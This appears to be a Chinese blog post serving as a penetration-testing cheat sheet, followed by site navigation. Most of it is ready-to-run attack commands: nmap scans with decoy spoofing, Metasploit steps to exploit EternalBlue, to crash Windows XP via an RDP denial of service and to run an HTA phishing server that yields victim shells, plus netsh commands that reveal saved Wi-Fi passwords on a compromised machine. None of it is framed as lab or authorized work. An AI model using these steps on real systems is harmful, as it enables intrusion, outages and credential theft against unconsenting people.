• 渗透测试


    信息搜集

    nmap --sP -iL abin.txt (从abin.txt导入ip地址列表进行扫描,-sP主机存货判断)
    nmap -A 120.55.226.24 (启用操作系统检测,版本检测,脚本扫描和跟踪路由)
    nmap -sS 120.55.226.24 (半连接扫描)
    nmap -sT 120.55.226.24 (全连接扫描)
    nmap -sU 120.55.226.24 (udp扫描)
    nmap -D 1.1.1.1 192.168.1.102 (伪装地址为1.1.1.1)
    nmap --mtu 8 192.168.1.102 (指定每个扫描包的大小)
    
    nmap ip -v 10.1.2.1/24 (扫描代表的是10.1.2.1 ~ 10.1.2.255 进行扫描)
    还有很多的工具,最常用的就是nmap,还有一个是xerosploit
    xerosploit安装:
    $ git clone https://github.com/LionSec/xerosploit.git
    接下来,用sudo命令运行安装脚本install.py:
    $ sudo python install.py
    

    漏洞利用工具msf

    msf打开方式

    直接在终端输入msfconsole
    进入msf的目录/usr/share/metasploit-framework,运行命令./msfconsole
    

    更新

    kali 运行命令apt update,apt install metasploit-framework
    

    ------------------------------------------------------------------------------------------

    1 How to exploit Windows Vista only by victim's using Kali Linux (永恒之蓝漏洞)

    (smb_ms17_010)
    # msfconsole
    #msf> use auxiliary/scanner/smb/smb_ms17_010 (利用该模块查看对方主机是否存在该漏洞)
    #msf> set RHOSTS (remote ip) (设置对方ip)
    #msf> run (开始扫描)
    #msf> use exploit/windows/smb/ms17_010_psexec (若扫描成功存在该漏洞,就开始利用这个利用模块)
    #msf> set RHOSTS (remote ip) (设置对方ip)
    #msf> exploit (开始渗透)

    ------------------------------------------------------------------------------------------

    2. How to crash windows xp(blue screen) with metasploit using kali linux (如何让winxp蓝屏)

    # msfconsole
    #msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids (漏洞利用)
    #msf> set rhost (remote ip)
    #msf> exploit  
    

    ------------------------------------------------------------------------------------------

    3. How to exploit windows with HTA server using kali linux (搞一个钓鱼网战,当用户点击下载的打开就中招)

    #msfconsole
    #msf> use windows/misc/hta_server/ (利用该模块)
    #msf> set srvhost (local ip) (设置服务器ip,通常是自己的ip)
    #msf> set uripath / (设置服务器路径)
    #msf> exploit (开始监听渗透)
    打开网页下载打开后.
    #msf> sessions (若别人下载打开之后,会出现payload反弹,使用该名令来查看靶机)
    #msf> sessions -i num (切换到渗透的靶机)
    

    ------------------------------------------------------------------------------------------

    5 How to get Windows Wi-Fi saved passwords using Metasploit and Kali Linux (如何获取对方的wifi密码)

    前提: 获取windows shell
    #msf> shell
    cmd> netsh wlan show profile (查看已缓存的wifi)
    cmd> netsh wlan show profile [wifi_name] key=clear (查看选定的wifi名密码)
    

    ------------------------------------------------------------------------------------------

  • 相关阅读:
    Using Spark's "Hadoop Free" Build
    关于Consul
    关于Eureka
    关于Gateway
    关于Ribbon
    关于Hystrix
    关于Feign
    关于SpringBoot
    关于架构
    关于敏捷开发Scrum(一)
  • 原文地址:https://www.cnblogs.com/lyxf/p/12093435.html
一二三 - 开发者的网上家园